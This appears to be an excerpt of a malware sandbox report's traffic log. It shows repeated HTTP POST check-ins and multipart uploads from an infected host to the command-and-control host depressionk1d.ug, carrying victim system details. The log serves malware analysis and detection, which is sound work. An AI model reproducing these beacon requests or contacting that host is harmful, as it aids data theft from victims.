              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
